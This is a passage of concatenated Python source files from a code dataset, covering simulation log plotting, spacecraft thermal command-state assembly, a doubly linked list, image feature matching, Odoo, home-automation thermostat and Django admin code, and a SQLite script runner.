nodes_rx = get_sim_flood_trx(log_data)\n plot_flood_trx(nodes_tx, nodes_rx)\n plt.tight_layout()\n plot_name = get_current_plot_name()\n pic_out(plot_name)\n plt.close()\n except DAException as e:\n raise e\n except Exception as e:\n logger.debug(\"Couldn't plot trx data\")\n\n try:\n nodes_nerr, nodes_nbad_pkt = get_sim_trx_errors(log_data)\n error_details = get_sim_trx_error_details(log_data)\n plt.figure()\n plot_trx_errors(nodes_nerr, nodes_nbad_pkt)\n plt.tight_layout()\n pic_out(\"errors\")\n plt.figure()\n plot_trx_error_details(error_details)\n plt.tight_layout()\n pic_out(\"error_details\")\n plt.close()\n except DAException as e:\n raise e\n except Exception as e:\n logger.debug(\"Couldn't plot trx detailed errors\")\n # -------------------------------------------------------------------------\n\n if pdf_fh is not None:\n pdf_fh.close()\n except BaseException as e:\n if pdf_fh is not None:\n pdf_fh.close()\n if os.path.isfile(plot_output):\n os.remove(plot_output)\n else:\n shutil.rmtree(plot_output)\n raise e\n\n\nif __name__ == \"__main__\":\n import argparse\n import os\n import sys\n\n BASE_PATH = os.path.dirname(sys.argv[0])\n # -------------------------------------------------------------------------\n # PARSING ARGUMENTS\n # -------------------------------------------------------------------------\n parser = argparse.ArgumentParser()\n # required arguments\n parser.add_argument(\"log_source\",\\\n help=\"The log file to analyse or the folder from which start searching logs\")\n # optional args\n parser.add_argument(\"-s\", \"--save-plots\",\\\n nargs=\"?\",\\\n const = True,\\\n help=\"The directory where plot figures are saved.\")\n parser.add_argument(\"-o\", \"--overwrite\",\\\n nargs = \"?\",\\\n const = True,\\\n default = False,\\\n help=\"Overwrite output files if already existing\")\n parser.add_argument(\"-f\", \"--save-format\",\\\n nargs = \"?\",\\\n const = \"pdf-multi\",\\\n default = \"pdf-multi\",\\\n choices = [\"png\", \"pdf\", \"pdf-multi\"],\\\n help=\"The format used when saving plots. Either PNG or PDF, single file or one file per page\")\n\n args = parser.parse_args()\n # -------------------------------------------------------------------------\n # INPUT CHECKING\n # -------------------------------------------------------------------------\n\n # set testbed to false if data comes from\n # the testbed\n FLIERS = False\n\n format_ = args.save_format\n if args.save_plots is True:\n dest_folder = None\n elif args.save_plots:\n\n dest_folder = os.path.abspath(args.save_plots)\n if not(os.path.exists(dest_folder) and os.path.isdir(dest_folder)):\n os.mkdir(dest_folder)\n else:\n # if no saving, then save format must be None (force interactive plots)\n dest_folder = None\n format_ = None\n # -------------------------------------------------------------------------\n\n if os.path.isfile(args.log_source):\n log_reg = re.compile(r\"(?:.*/)*(.*).log$\")\n match = log_reg.match(args.log_source)\n if match:\n name = match.group(1)\n plot_simulation_results(name, args.log_source, format_, dest_folder)\n else:\n raise ValueError(\"The file given is not a log file\")\n\n elif os.path.isdir(args.log_source):\n\n # avoid doing an interactive session in this case, even if asked (too\n # much plots)\n if format_ is None:\n print(\"Interactive session unavailable when directories are given\")\n sys.exit(0)\n\n plots_done = 0\n plots_undone = []\n for sim_name, log_path in simulation_log_iter(args.log_source):\n try:\n plot_simulation_results(sim_name, log_path, format_, dest_folder, overwrite=args.overwrite)\n plots_done += 1\n except DAException as e:\n # data analysis exceptions are important, don't skip them\n raise e\n except Exception:\n logger.error(\"Invalid log found. Skipped: {}\".format(log_path))\n plots_undone.append(log_path)\n print(\"-\"*40)\n print(\"{} simulations successfully processed\".format(plots_done))\n print(\"{} simulations haven't been processed due to errors\".format(len(plots_undone)))\n print(\"-\"*40)\n if len(plots_undone) > 0:\n print(\"Bad logs:\\n\" + \"-\"*40)\n for badlog in plots_undone:\n print(badlog)\n\n","sub_path":"apps/glossy-test/test_tools/analysis/sim_visualiser.py","file_name":"sim_visualiser.py","file_ext":"py","file_size_in_byte":21752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"611935109","text":"import os\nimport Ska.DBI\nfrom Chandra.Time import DateTime\nfrom pprint import pformat\nimport Chandra.cmd_states as cmd_states\nimport logging\nfrom Ska.File import get_globfiles\n\n\nclass StateBuilder(object):\n \"\"\"\n This is the base class for all StateBuilder objects. It\n should not be used by itself, but subclassed.\n \"\"\"\n def __init__(self, logger=None):\n if logger is None:\n # Make a logger but with no output\n logger = logging.getLogger('statebuilder-no-logger')\n self.logger = logger\n\n def get_prediction_states(self, tlm):\n \"\"\"\n Get the states used for the thermal prediction.\n\n Parameters\n ----------\n tlm : dictionary\n Dictionary containg temperature and other telemetry\n \"\"\"\n raise NotImplementedError(\"'StateBuilder should be subclassed!\")\n\n def _get_bs_cmds(self):\n \"\"\"\n Internal method used to obtain commands from the backstop \n file and store them.\n \"\"\"\n import Ska.ParseCM\n if os.path.isdir(self.backstop_file):\n # Returns a list but requires exactly 1 match\n backstop_file = get_globfiles(os.path.join(self.backstop_file,\n 'CR*.backstop'))[0]\n else:\n backstop_file = self.backstop_file\n self.logger.info('Using backstop file %s' % backstop_file)\n bs_cmds = Ska.ParseCM.read_backstop(backstop_file)\n self.logger.info('Found %d backstop commands between %s and %s' %\n (len(bs_cmds), bs_cmds[0]['date'], bs_cmds[-1]['date']))\n self.bs_cmds = bs_cmds\n self.tstart = bs_cmds[0]['time']\n self.tstop = bs_cmds[-1]['time']\n\n def get_validation_states(self, datestart, datestop):\n \"\"\"\n Get states for validation of the thermal model.\n\n Parameters\n ----------\n datestart : string\n The start date to grab states afterward.\n datestop : string\n The end date to grab states before.\n \"\"\"\n datestart = DateTime(datestart).date\n datestop = DateTime(datestop).date\n self.logger.info('Getting commanded states between %s - %s' %\n (datestart, datestop))\n\n # Get all states that intersect specified date range\n cmd = \"\"\"SELECT * FROM cmd_states\n WHERE datestop > '%s' AND datestart < '%s'\n ORDER BY datestart\"\"\" % (datestart, datestop)\n self.logger.debug('Query command: %s' % cmd)\n states = self.db.fetchall(cmd)\n self.logger.info('Found %d commanded states' % len(states))\n\n # Set start and end state date/times to match telemetry span. Extend the\n # state durations by a small amount because of a precision issue converting\n # to date and back to secs. (The reference tstop could be just over the\n # 0.001 precision of date and thus cause an out-of-bounds error when\n # interpolating state values).\n states[0].tstart = DateTime(datestart).secs - 0.01\n states[0].datestart = DateTime(states[0].tstart).date\n states[-1].tstop = DateTime(datestop).secs + 0.01\n states[-1].datestop = DateTime(states[-1].tstop).date\n\n return states\n\n\nclass SQLStateBuilder(StateBuilder):\n \"\"\"\n The SQLStateBuilder contains the original code used to \n obtain commanded states for prediction and validation of\n a thermal model for a particular command load. It can also\n be used for validation only.\n \"\"\"\n def __init__(self, interrupt=False, backstop_file=None, \n logger=None):\n \"\"\"\n Give the SQLStateBuilder arguments that were passed in \n from the command line, and set up the connection to the \n commanded states database.\n\n Parameters\n ----------\n interrupt : boolean\n If True, this is an interrupt load.\n backstop_file : string\n Path to the backstop file. If a directory, the backstop \n file will be searched for within this directory.\n logger : Logger object, optional\n The Python Logger object to be used when logging.\n \"\"\"\n super(SQLStateBuilder, self).__init__(logger=logger)\n self.interrupt = interrupt\n self.backstop_file = backstop_file\n # Connect to database \n server = os.path.join(os.environ['SKA'], 'data', 'cmd_states', 'cmd_states.db3')\n self.logger.info('Connecting to {} to get cmd_states'.format(server))\n self.db = Ska.DBI.DBI(dbi=\"sqlite\", server=server, user='aca_read',\n database='aca')\n if self.backstop_file is not None:\n self._get_bs_cmds()\n#\n# REMOVED _get_bs_cmds call from this location (01/19/2018)\n# Moved the method to the Base class.\n\n def get_prediction_states(self, tbegin):\n \"\"\"\n Get the states used for the prediction.\n\n Parameters\n ----------\n tbegin : string\n The starting date/time from which to obtain states for\n prediction.\n \"\"\"\n\n \"\"\"\n Get state0 as last cmd_state that starts within available telemetry. \n The original logic in get_state0() is to return a state that\n is absolutely, positively reliable by insisting that the\n returned state is at least ``date_margin`` days old, where the\n default is 10 days. That is too conservative (given the way\n commanded states are actually managed) and not what is desired\n here, which is a recent state from which to start thermal propagation.\n\n Instead we supply ``date_margin=None`` so that get_state0 will\n find the newest state consistent with the ``date`` criterion\n and pcad_mode == 'NPNT'.\n \"\"\"\n\n state0 = cmd_states.get_state0(tbegin, self.db, datepar='datestart',\n date_margin=None)\n\n self.logger.debug('state0 at %s is\\n%s' % (DateTime(state0['tstart']).date,\n pformat(state0)))\n\n # Get commands after end of state0 through first backstop command time\n cmds_datestart = state0['datestop']\n cmds_datestop = self.bs_cmds[0]['date']\n\n # Get timeline load segments including state0 and beyond.\n timeline_loads = self.db.fetchall(\"\"\"SELECT * from timeline_loads\n WHERE datestop >= '%s'\n and datestart < '%s'\"\"\"\n % (cmds_datestart, cmds_datestop))\n self.logger.info('Found {} timeline_loads after {}'.format(\n len(timeline_loads), cmds_datestart))\n\n # Get cmds since datestart within timeline_loads\n db_cmds = cmd_states.get_cmds(cmds_datestart, db=self.db, update_db=False,\n timeline_loads=timeline_loads)\n\n # Delete non-load cmds that are within the backstop time span\n # => Keep if timeline_id is not None (if a normal load)\n # or date < bs_cmds[0]['time']\n\n # If this is an interrupt load, we don't want to include the end \n # commands from the continuity load since not all of them will be valid,\n # and we could end up evolving on states which would not be present in \n # the load under review. However, once the load has been approved and is\n # running / has run on the spacecraft, the states in the database will \n # be correct, and we will want to include all relevant commands from the\n # continuity load. To check for this, we find the current time and see \n # the load under review is still in the future. If it is, we then treat\n # this as an interrupt if requested, otherwise, we don't. \n current_time = DateTime().secs\n interrupt = self.interrupt and self.bs_cmds[0][\"time\"] > current_time\n\n db_cmds = [x for x in db_cmds\n if ((x['timeline_id'] is not None and not interrupt) or\n x['time'] < self.bs_cmds[0]['time'])]\n\n self.logger.info('Got %d cmds from database between %s and %s' %\n (len(db_cmds), cmds_datestart, cmds_datestop))\n\n # Get the commanded states from state0 through the end of backstop commands\n states = cmd_states.get_states(state0, db_cmds + self.bs_cmds)\n states[-1].datestop = self.bs_cmds[-1]['date']\n states[-1].tstop = self.bs_cmds[-1]['time']\n self.logger.info('Found %d commanded states from %s to %s' %\n (len(states), states[0]['datestart'], \n states[-1]['datestop']))\n\n return states, state0\n\n\n#-------------------------------------------------------------------------------\n# ACIS Ops Load History assembly \n#-------------------------------------------------------------------------------\nclass ACISStateBuilder(StateBuilder):\n\n def __init__(self, interrupt=False, backstop_file=None, nlet_file=None, \n logger=None):\n \"\"\"\n Give the ACISStateBuilder arguments that were passed in \n from the command line, and set up the connection to the \n commanded states database. \n\n Parameters\n ----------\n interrupt : boolean\n If True, this is an interrupt load.\n backstop_file : string\n Path to the backstop file. If a directory, the backstop \n file will be searched for within this directory.\n nlet_file : string\n full path to the Non-Load Event Tracking file\n logger : Logger object, optional\n The Python Logger object to be used when logging.\n \"\"\"\n # Import the BackstopHistory class\n from backstop_history import BackstopHistory\n\n # Capture the full path to the NLET file to be used\n self.nlet_file = nlet_file\n\n # Create an instance of the Backstop Command class\n self.BSC = BackstopHistory.BackstopHistory('ACIS-Continuity.txt', self.nlet_file)\n\n # The Review Load backstop name\n self.rev_bs_name = None\n # Normally I would have created the self.rev_bs_cmds attribute\n # and used that however to work with ATC I changed it to bs_cmds.\n\n super(ACISStateBuilder, self).__init__(logger=logger)\n self.interrupt = interrupt\n self.backstop_file = backstop_file\n\n # if the user supplied a full path to the backstop file then\n # capture the backstop file name and the commands within the backstop file.\n if backstop_file is not None:\n # Get tstart, tstop, commands from backstop file in args.oflsdir\n # These are the REVIEW backstop commands.\n # NOTE: This method takes every command. it does not eliminate\n # commands that are not of interest as sot/cmd_states/get_cmds does.\n rev_bs_cmds, self.rev_bs_name = self.BSC.get_bs_cmds(self.backstop_file)\n\n # Store the Review Load backstop commands in the class attribute and\n # also capture the Review load time of first command (TOFC) and\n # Time of Last Command (TOLC).\n self.bs_cmds = rev_bs_cmds\n self.tstart = rev_bs_cmds[0]['time']\n self.tstop = rev_bs_cmds[-1]['time']\n\n # Connect to database (NEED TO USE aca_read for sybase; user is ignored for sqlite)\n # We only need this as the quick way to get the validation states.\n server = os.path.join(os.environ['SKA'], 'data', 'cmd_states', 'cmd_states.db3')\n self.logger.info('Connecting to {} to get cmd_states'.format(server))\n self.db = Ska.DBI.DBI(dbi=\"sqlite\", server=server, user='aca_read',\n database='aca')\n\n def get_prediction_states(self, tbegin):\n \"\"\"\n Get the states used for the prediction. This includes both the\n states from the review load backstop file and all the \n states between the latest telemetry data and the beginning \n of that review load backstop file.\n\n The Review Backstop commands already obtained.\n Telemtry from 21 days back to the latest in Ska obtained.\n\n So now the task is to backchain through the loads and assemble\n any states missing between the end of telemetry through the start\n of the review load.\n\n Parameters\n ----------\n tbegin : string\n The starting date/time from which to obtain states for\n prediction. This is tlm['date'][-5]) or, in other words, the\n date used is 5 enteries back from the end of the fetched telemetry\n \"\"\"\n\n \"\"\"\n Get state0 as last cmd_state that starts within available telemetry. \n The original logic in get_state0() is to return a state that\n is absolutely, positively reliable by insisting that the\n returned state is at least ``date_margin`` days old, where the\n default is 10 days. That is too conservative (given the way\n commanded states are actually managed) and not what is desired\n here, which is a recent state from which to start thermal propagation.\n\n Instead we supply ``date_margin=None`` so that get_state0 will\n find the newest state consistent with the ``date`` criterion\n and pcad_mode == 'NPNT'.\n \"\"\"\n # If an OFLS directory has been specified, get the backstop commands\n # stored in the backstop file in that directory\n\n # Ok ready to start the collection of continuity commands\n #\n # Make a copy of the Review Load Commands. This will have \n # Continuity commands concatenated to it and will be the final product\n\n import copy\n\n bs_cmds = copy.copy(self.bs_cmds)\n bs_start_time = bs_cmds[0]['time']\n present_ofls_dir = copy.copy(self.backstop_file)\n\n # So long as the earliest command in bs_cmds is after the state0\n # time, keep concatenating continuity commands to bs_cmds based upon\n # the type of load.\n # Note that as you march back in time along the load chain, \"ofls_dir\" will change.\n\n # First we need a State0 because cmd_states.get_states cannot translate\n # backstop commands into commanded states without one. cmd_states.get_state0\n # is written such that if you don't give it a database object it will \n # create one for itself and use that. Here, all that really matters \n # is the value of 'tbegin', the specification of the date parameter to be used\n # and the date_margin.\n state0 = cmd_states.get_state0(tbegin, self.db, datepar='datestart',\n date_margin=None)\n # WHILE\n # The big while loop that backchains through previous loads and concatenates the\n # proper load sections to the review load.\n while state0['tstart'] < bs_start_time:\n\n # Read the Continuity information of the present ofls directory\n cont_load_path, present_load_type, scs107_date = self.BSC.get_continuity_file_info(present_ofls_dir)\n\n #---------------------- NORMAL ----------------------------------------\n # If the load type is \"normal\" then grab the continuity command\n # set and concatenate those commands to the start of bs_cmds\n if present_load_type.upper() == 'NORMAL':\n # Obtain the continuity load commands\n cont_bs_cmds, cont_bs_name = self.BSC.get_bs_cmds(cont_load_path)\n\n # Combine the continuity commands with the bs_cmds\n bs_cmds = self.BSC.CombineNormal(cont_bs_cmds, bs_cmds)\n\n # Reset the backstop collection start time for the While loop\n bs_start_time = bs_cmds[0]['time']\n # Now point the operative ofls directory to the Continuity directory\n present_ofls_dir = cont_load_path\n\n #---------------------- TOO ----------------------------------------\n # If the load type is \"too\" then grab the continuity command\n # set and concatenate those commands to the start of bs_cmds\n elif present_load_type.upper() == 'TOO':\n # Obtain the continuity load commands\n cont_bs_cmds, cont_bs_name = self.BSC.get_bs_cmds(cont_load_path)\n\n # Combine the continuity commands with the bs_cmds\n bs_cmds = self.BSC.CombineTOO(cont_bs_cmds, bs_cmds)\n\n # Reset the backstop collection start time for the While loop\n bs_start_time = bs_cmds[0]['time']\n # Now point the operative ofls directory to the Continuity directory\n present_ofls_dir = cont_load_path\n\n #---------------------- STOP ----------------------------------------\n # If the load type is \"STOP\" then grab the continuity command\n # set and concatenate those commands to the start of bs_cmds\n # Take into account the SCS-107 commands which shut ACIS down\n # and any LTCTI run\n elif present_load_type.upper() == 'STOP':\n\n # Obtain the continuity load commands\n cont_bs_cmds, cont_bs_name = self.BSC.get_bs_cmds(cont_load_path)\n\n # CombineSTOP the continuity commands with the bs_cmds\n bs_cmds = self.BSC.CombineSTOP(cont_bs_cmds, bs_cmds, scs107_date )\n\n # Reset the backstop collection start time for the While loop\n bs_start_time = bs_cmds[0]['time']\n # Now point the operative ofls directory to the Continuity directory\n present_ofls_dir = cont_load_path\n\n #---------------------- SCS-107 ----------------------------------------\n # If the load type is \"STOP\" then grab the continuity command\n # set and concatenate those commands to the start of bs_cmds\n # Take into account the SCS-107 commands which shut ACIS down\n # and any LTCTI run\n elif present_load_type.upper() == 'SCS-107':\n # Obtain the continuity load commands\n cont_bs_cmds, cont_bs_name = self.BSC.get_bs_cmds(cont_load_path)\n # Store the continuity bs commands as a chunk in the chunk list\n\n # Obtain the CONTINUITY load Vehicle-Only file\n vo_bs_cmds, vo_bs_name = self.BSC.get_vehicle_only_bs_cmds(cont_load_path)\n\n # Combine107 the continuity commands with the bs_cmds\n bs_cmds = self.BSC.Combine107(cont_bs_cmds, vo_bs_cmds, bs_cmds, scs107_date )\n\n # Reset the backstop collection start time for the While loop\n bs_start_time = bs_cmds[0]['time']\n # Now point the operative ofls directory to the Continuity directory\n present_ofls_dir = cont_load_path\n\n # Convert the assembled backstop command history into commanded states\n # from state0 through the end of the Review Load backstop commands.\n # get_states trims the list to any command whose time is AFTER the state0 START\n # time and then converts each relevant backstop command, in that resultant list,\n # into a pseudo-commanded states state\n states = cmd_states.get_states(state0, bs_cmds)\n\n # Get rid of the 2099 placeholder stop date\n states[-1].datestop = bs_cmds[-1]['date']\n states[-1].tstop = bs_cmds[-1]['time']\n\n self.logger.debug('state0 at %s is\\n%s' % (DateTime(state0['tstart']).date,\n pformat(state0)))\n\n return states, state0\n\n\nstate_builders = {\"sql\": SQLStateBuilder,\n \"acis\": ACISStateBuilder}\n","sub_path":"acis_thermal_check/state_builder.py","file_name":"state_builder.py","file_ext":"py","file_size_in_byte":19851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"378199617","text":"#from doubly_linked_list import Node\n\nclass DoublyLinkedList:\n \"\"\" This is Doubly Linked List.\n \"\"\"\n\n def __init__(self, start=None, last=None, len=0):\n self.start = start\n self.last = last\n self.len = len\n\n def get_node(self, index):\n current = self.first\n for i in range(index):\n if current is None:\n return None\n current = current.next\n return current\n \n def insert_after(self, ref_node, new_node):\n new_node.prev = ref_node\n if ref_node.next is None:\n self.last = new_node\n else:\n new_node.next = ref_node.next\n new_node.next.prev = new_node\n ref_node.next = new_node\n self.len += 1\n\n def insert_before(self, ref_node, new_node):\n new_node.next = ref_node\n if ref_node.prev is None:\n self.first = new_node\n else:\n new_node.prev = ref_node.prev\n new_node.prev.next = new_node\n ref_node.prev = new_node\n self.len += 1\n\n def insert_at_begin(self, new_node):\n if self.first is None:\n self.first = new_node\n self.last = new_node\n else:\n self.insert_before(self.first, new_node)\n self.len += 1\n\n def insert_at_end(self, new_node):\n if self.last is None:\n self.last = new_node\n self.first = new_node\n else:\n self.insert_after(self.last, new_node)\n self.len += 1\n \n def remove(self, node):\n if node.prev is None:\n self.first = node.next\n else:\n node.prev.next = node.next\n \n if node.next is None:\n self.last = node.prev\n else:\n node.next.prev = node.prev\n self.len -=1\n \n def display(self):\n current = self.first\n while current:\n print(current.data, end = ' ')\n current = current.next\n\n def to_list(self): # return a python list with the elements of the doubly-linked list\n res = []\n curr = self.first\n while curr != None:\n res.append(curr.val)\n curr = curr.next\n return res\n\n def is_empty(self): # check whether the list is empty\n return self.len == 0\n\nclass Node:\n def __init__(self, next=None, prev=None, data=None):\n self.next = next # reference to next node in DLL \n self.prev = prev # reference to previous node in DLL \n self.data = data\n\n def __hash__(self, data):\n pass\n\n def __str__(self, data):\n pass","sub_path":"lru_cache/lru_cache/doubly_linked_list.py","file_name":"doubly_linked_list.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"530027645","text":"#!/usr/bin/python3\n\nimport argparse\nimport pickle\nimport numpy as np\nimport os\n\nfrom props import getNode\n\nfrom lib import Matcher\nfrom lib import Pose\nfrom lib import ProjectMgr\nfrom lib import SRTM\n\n# working on matching features ...\ndef match(project_dir, matching_options):\n\n \n matcher = matching_options[0]\n match_ratio = matching_options[1]\n min_pairs = matching_options[2]\n min_dist = matching_options[3]\n max_dist = matching_options[4]\n filters = matching_options[5]\n min_chain_length = matching_options[6]\n\n proj = ProjectMgr.ProjectMgr(project_dir)\n proj.load_images_info()\n proj.load_features(descriptors=False) # descriptors cached on the fly later\n proj.undistort_keypoints()\n proj.load_match_pairs()\n\n matcher_node = getNode('/config/matcher', True)\n matcher_node.setString('matcher', matcher)\n matcher_node.setFloat('match_ratio', match_ratio)\n matcher_node.setString('filter', filters)\n matcher_node.setInt('min_pairs', min_pairs)\n matcher_node.setFloat('min_dist', min_dist)\n matcher_node.setFloat('max_dist', max_dist)\n matcher_node.setInt('min_chain_len', min_chain_length)\n\n # save any config changes\n proj.save()\n\n # camera calibration\n K = proj.cam.get_K()\n print(\"K:\", K)\n\n # fire up the matcher\n m = Matcher.Matcher()\n m.configure()\n m.robustGroupMatches(proj.image_list, K,\n filter=filters, review=False)\n\n # The following code is deprecated ...\n do_old_match_consolodation = False\n if do_old_match_consolodation:\n # build a list of all 'unique' keypoints. Include an index to each\n # containing image and feature.\n matches_dict = {}\n for i, i1 in enumerate(proj.image_list):\n for j, matches in enumerate(i1.match_list):\n if j > i:\n for pair in matches:\n key = \"%d-%d\" % (i, pair[0])\n m1 = [i, pair[0]]\n m2 = [j, pair[1]]\n if key in matches_dict:\n feature_dict = matches_dict[key]\n feature_dict['pts'].append(m2)\n else:\n feature_dict = {}\n feature_dict['pts'] = [m1, m2]\n matches_dict[key] = feature_dict\n #print match_dict\n count = 0.0\n sum = 0.0\n for key in matches_dict:\n sum += len(matches_dict[key]['pts'])\n count += 1\n if count > 0.1:\n print(\"total unique features in image set = %d\" % count)\n print(\"kp average instances = %.4f\" % (sum / count))\n\n # compute an initial guess at the 3d location of each unique feature\n # by averaging the locations of each projection\n for key in matches_dict:\n feature_dict = matches_dict[key]\n sum = np.array( [0.0, 0.0, 0.0] )\n for p in feature_dict['pts']:\n sum += proj.image_list[ p[0] ].coord_list[ p[1] ]\n ned = sum / len(feature_dict['pts'])\n feature_dict['ned'] = ned.tolist()\n\n def update_match_location(match):\n sum = np.array( [0.0, 0.0, 0.0] )\n for p in match[1:]:\n # print proj.image_list[ p[0] ].coord_list[ p[1] ]\n sum += proj.image_list[ p[0] ].coord_list[ p[1] ]\n ned = sum / len(match[1:])\n # print \"avg =\", ned\n match[0] = ned.tolist()\n return match\n\n if False:\n print(\"Constructing unified match structure...\")\n print(\"This probably will fail because we didn't do the ground intersection at the start...\")\n matches_direct = []\n for i, image in enumerate(proj.image_list):\n # print image.name\n for j, matches in enumerate(image.match_list):\n # print proj.image_list[j].name\n if j > i:\n for pair in matches:\n match = []\n # ned place holder\n match.append([0.0, 0.0, 0.0])\n match.append([i, pair[0]])\n match.append([j, pair[1]])\n update_match_location(match)\n matches_direct.append(match)\n # print pair, match\n\n print(\"Writing match file ...\")\n pickle.dump(matches_direct, open(project_dir + \"/matches_direct\", \"wb\"))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Keypoint projection.')\n parser.add_argument('--project', required=True, help='project directory')\n parser.add_argument('--matcher', default='FLANN',\n choices=['FLANN', 'BF'])\n parser.add_argument('--match-ratio', default=0.75, type=float,\n help='match ratio')\n parser.add_argument('--min-pairs', default=25, type=int,\n help='minimum matches between image pairs to keep')\n parser.add_argument('--min-dist', default=0, type=float,\n help='minimum 2d camera distance for pair comparison')\n parser.add_argument('--max-dist', default=75, type=float,\n help='maximum 2d camera distance for pair comparison')\n parser.add_argument('--filter', default='gms',\n choices=['gms', 'homography', 'fundamental', 'essential', 'none'])\n parser.add_argument('--min-chain-length', type=int, default=3, help='minimum match chain length (3 recommended)')\n #parser.add_argument('--ground', type=float, help='ground elevation in meters')\n\n args = parser.parse_args()\n\n matching_options = [args.matcher, args.match_ratio, args.min_pairs, args.min_distance,\n args.filter, args.min_chain_length]\n \n match(args.prject, matching_options)\n","sub_path":"scripts/4a_matching.py","file_name":"4a_matching.py","file_ext":"py","file_size_in_byte":5874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"155823610","text":"from openerp import models, fields, api\r\n\r\nclass sale_order_wysiwyg(models.Model):\r\n _inherit = 'sale.order'\r\n \r\n footer_text = fields.Html(string=\"Footer text\")\r\n\r\n @api.multi\r\n def print_online_quotation(self):\r\n url = '/quote/' + str(self.id) + '?pdf=True'\r\n return {\r\n 'name' : 'Go to website',\r\n 'res_model': 'ir.actions.act_url',\r\n 'type' : 'ir.actions.act_url',\r\n 'target' : 'new',\r\n 'url' : url\r\n }\r\n","sub_path":"sale_wysiwyg_online_quote/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"306238579","text":"\"\"\"\n-*- _test-case-name: PyHouse.src.Modules.Web._test.test_web_thermostats -*-\n\n@name: PyHouse/src/Modules/Web/web_thermostats.py\n@author: D. Brian Kimmel\n@contact: D.BrianKimmel@gmail.com\n@copyright: (c) 2014-2017 by D. Brian Kimmel\n@license: MIT License\n@note: Created on Jul 1, 2014\n@summary: Handle the Thermostat information for a house.\n\n\"\"\"\n\n__updated__ = '2017-01-27'\n\n# Import system type stuff\nimport os\nfrom nevow import athena\nfrom nevow import loaders\n\n# Import PyMh files and modules.\nfrom Modules.Core.data_objects import ThermostatData\nfrom Modules.Computer.Web import web_family, web_utils\nfrom Modules.Computer.Web.web_utils import GetJSONHouseInfo\nfrom Modules.Core.Utilities import json_tools\nfrom Modules.Core import logging_pyh as Logger\nLOG = Logger.getLogger('PyHouse.webThermost ')\n\n# Handy helper for finding external resources nearby.\nwebpath = os.path.join(os.path.split(__file__)[0])\ntemplatepath = os.path.join(webpath, 'template')\n\n\nclass ThermostatsElement(athena.LiveElement):\n \"\"\" a 'live' thermostat element.\n \"\"\"\n docFactory = loaders.xmlfile(os.path.join(templatepath, 'thermostatElement.html'))\n jsClass = u'thermostats.ThermostatsWidget'\n\n def __init__(self, p_workspace_obj, _p_params):\n self.m_workspace_obj = p_workspace_obj\n self.m_pyhouse_obj = p_workspace_obj.m_pyhouse_obj\n\n @athena.expose\n def getHouseData(self):\n l_json = GetJSONHouseInfo(self.m_pyhouse_obj)\n return l_json\n\n @athena.expose\n def saveThermostatsData(self, p_json):\n \"\"\"Thermostat data is returned, so update the info.\n \"\"\"\n l_json = json_tools.decode_json_unicode(p_json)\n l_delete = l_json['Delete']\n l_ix = int(l_json['Key'])\n if l_delete:\n try:\n del self.m_pyhouse_obj.House.Hvac.Thermostats[l_ix]\n except AttributeError:\n LOG.error(\"web_thermostats - Failed to delete - JSON: {}\".format(l_json))\n return\n try:\n l_obj = self.m_pyhouse_obj.House.Hvac.Thermostats[l_ix]\n except KeyError:\n LOG.warning('Creating a new Thermostat for Key:{}'.format(l_ix))\n l_obj = ThermostatData()\n #\n web_utils.get_base_info(l_obj, l_json)\n l_obj.Comment = l_json['Comment']\n l_obj.CoolSetPoint = l_json['CoolSetPoint']\n l_obj.CurrentTemperature = 0\n l_obj.DeviceFamily = l_json['DeviceFamily']\n l_obj.DeviceSubType = 1\n l_obj.DeviceType = 2\n l_obj.HeatSetPoint = l_json['HeatSetPoint']\n l_obj.ThermostatMode = 'Auto' # Cool | Heat | Auto | EHeat\n l_obj.ThermostatScale = 'F' # F | C\n l_obj.ThermostatStatus = 'Off'\n web_family.get_family_json_data(l_obj, l_json)\n web_utils.get_room_info(l_obj, l_json)\n self.m_pyhouse_obj.House.Hvac.Thermostats[l_ix] = l_obj # Put into internal data store\n LOG.info('Thermostat Added - {}'.format(l_obj.Name))\n\n# ## END DBK\n","sub_path":"Project/src/Modules/Computer/Web/web_thermostats.py","file_name":"web_thermostats.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"475352585","text":"from django.contrib import admin\nfrom django.contrib.flatpages.admin import FlatPageAdmin\nfrom django.contrib.flatpages.models import FlatPage\n\n# Register your models here.\nclass FlatPageAdmin(FlatPageAdmin):\n fieldsets = (\n (None, {'fields': ('url', 'title', 'content', 'sites')}),\n ('Advanced options', {\n 'classes': ('collapse', ),\n 'fields': (\n 'enable_comments',\n 'registration_required',\n 'template_name',\n ),\n }),\n )\n# register page\nadmin.site.unregister(FlatPage) \nadmin.site.register(FlatPage, FlatPageAdmin)","sub_path":"docs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"53823774","text":"if __name__ == \"__main__\":\n import os\n import sys\n\n sys.path.append(os.getcwd())\n\nimport sqlite3\nimport os\nfrom sqlite3.dbapi2 import OperationalError\n\n\nclass DB:\n \"\"\"Interface class for executing queries to the database\"\"\"\n\n # Get the directory of the current file\n # Set the db path to current directory\n def __init__(self, database):\n self.curr_dir = os.path.dirname(__file__)\n self.db_path = os.path.join(self.curr_dir, database)\n\n def execute_script_from_file(self, filename):\n \"\"\"Executes commands from an sql file\n\n Args:\n filename (sql file): sql file to execute\n \"\"\"\n filename = os.path.join(self.curr_dir, filename)\n # Connect to db\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with open(filename, \"r\", encoding=\"utf-8\") as sql_file:\n sql_script = sql_file.read()\n\n # all SQL commands (split on ';')\n sql_commands = filter(None, sql_script.split(\";\"))\n # Execute every command from the input file\n for command in sql_commands:\n # This will skip and report errors\n # For example, if the tables do not yet exist, this will skip over\n # the DROP TABLE commands\n try:\n cursor.execute(command)\n except OperationalError as msg:\n print(\"Command skipped: \", msg)\n conn.commit()\n 